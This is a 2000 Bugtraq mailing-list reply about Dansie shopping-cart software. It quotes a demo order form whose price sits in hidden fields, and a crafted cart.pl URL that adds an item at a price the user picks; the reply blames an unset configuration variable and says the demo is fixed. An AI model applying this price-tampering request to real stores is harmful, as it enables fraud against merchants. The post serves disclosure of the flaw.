[14532] in bugtraq
Re: more problems with that POS dansie cart software!
daemon@ATHENA.MIT.EDU (Pete Holsberg)
Sun Apr 16 21:43:48 2000
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Message-Id: <Pine.GSO.4.10.10004161843531.1447-100000@tecoma.mccc.edu>
Date: Sun, 16 Apr 2000 18:45:58 -0400
Reply-To: pjh@mccc.edu
From: Pete Holsberg <pjh@MCCC.EDU>
X-To: tombow <juice@3SHEEP.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To: <Pine.GSO.4.05.10004141056510.8165-100000@los-angeles.mtvnodn.com>
On Fri, 14 Apr 2000, tombow wrote:
> if installing a backdoor in the cart software wasn't bad enough.. the
> whole implimentation of pricing and adding items to cart is crap..
>
> example form to add items to your cart (kindly provided on the publishers
> site using the demo cart they set up for us):
>
> *snip*
>
> <FORM METHOD=POST ACTION="http://www.dansie.net/cgi-bin/scripts/cart.pl">
>
> Black Leather purse with leather straps<BR>
> Price: $20.00<BR>
>
> <INPUT TYPE=HIDDEN NAME=name VALUE="Black leather purse">
> <INPUT TYPE=HIDDEN NAME=price VALUE="20.00">
> <INPUT TYPE=HIDDEN NAME=sh VALUE="1"> <!-- Shipping and Handling
> -->
> <INPUT TYPE=HIDDEN NAME=img VALUE="purse.jpg">
> <INPUT TYPE=HIDDEN NAME=return VALUE="http://www.dansie.net/demo.html">
> <INPUT TYPE=HIDDEN NAME=custom1 VALUE="Black leather purse with leather straps">
>
> <INPUT TYPE=SUBMIT NAME="add" VALUE="Put in Shopping Cart">
> </FORM>
>
> *snip*
>
>
> a couple of quick alterations and we can now add:
>
> one piece of crap cart software..
>
> http://www.dansie.net/cgi-bin/scripts/cart.pl?name=piece+of+crap+cart+software&price=1.00&sh=1&img=purse.jpg&return=http://www.dansie.net/demo.html&custom1=my+shopping+cart+software+sucks+because+i+let+users+manipulate+crucial+variables
>
This occurs because the person who configured the script
failed to set "persoanl variable #66". Dansie has since
done that at www.dansie.net so that the above URL now fails
to change the shopping cart variables.
Pete
